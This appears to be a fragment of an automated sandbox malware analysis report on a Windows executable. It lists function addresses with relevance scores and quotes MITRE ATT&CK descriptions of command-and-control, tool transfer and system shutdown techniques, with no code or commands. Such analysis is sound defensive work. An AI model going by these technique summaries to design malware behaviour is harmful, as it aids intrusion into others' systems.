C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exe

Windows Analysis Report
r5yYt97sfB.exe

Function 004033B6 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401
stringfilecomCOMMON

Function 00405421 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 004061A5 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405974 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403D6F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004039CC Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402E41 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203
memoryCOMMON

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre